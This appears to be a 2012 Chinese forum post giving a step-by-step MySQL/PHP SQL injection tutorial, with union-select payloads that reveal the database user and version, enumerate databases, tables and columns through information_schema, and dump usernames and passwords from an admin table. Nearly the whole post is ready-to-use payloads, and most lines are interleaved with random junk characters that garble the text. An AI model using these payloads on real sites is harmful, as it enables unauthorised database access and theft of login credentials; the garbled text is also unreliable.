" ]6 g0 e5 M: Q) R) b" c: j
教程内容:Mysql 5+php 注入
9 k3 t/ q$ a5 P# b
8 m5 `& J) ?" }
* L4 c0 Z0 L9 F5 y5 w: I; F; O( |2 g2 p1 M% w" j$ d
一.查看MYSQL基本信息(库名,版本,用户)0 b5 d6 W; v" u
9 `# {4 C/ V2 H5 f/ O d/ `: w) rand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*6 ^- e `1 V/ A8 n' |! i' |$ I
) ]/ }6 {5 _' ^
二.查数据库+ U9 F6 w2 h- ~$ R
$ j. l' N3 Z& |& _+ n% U
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*3 c) c: M8 }: _1 ?! q& C) y
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
F+ u" m- L3 m# m& M2 L$ F+ c* B( o& `1 h9 f9 m/ L
三.暴表# l& D6 P+ m# V9 _9 H% u6 `
' T+ @3 j$ T& ~! ]. E3 Uand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*2 |$ j, ~+ ^& @' Q: q! f
! A" }; r* U( ?4 N) S. blimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。8 ^; q/ n1 B* A k* h) B8 h
$ x9 q+ K. e) g' h2 v
四.暴字段2 p( |. R) a, T7 X; W
- k" }) }% C4 K M- L( J1 [5 t
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
; ~5 K: w! e4 x R: q7 K
( v$ p4 j7 T; }9 k5 V& zlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。9 L, E& g; a3 s$ P( i/ m1 o
) V# P! f% ~ [
五.暴数据/ G4 b9 _7 @ l% Q
0 x$ }/ z+ ]! H$ @: {) S
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
?1 ]# L# V5 g5 e
4 T& T1 p' X+ P# D$ j2 X) W8 z) ~" J% d" O, S) X
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。9 U7 C, d G- o4 y) T9 _0 h
|
发表于 2012-9-13 16:27:53
收藏
支持
反对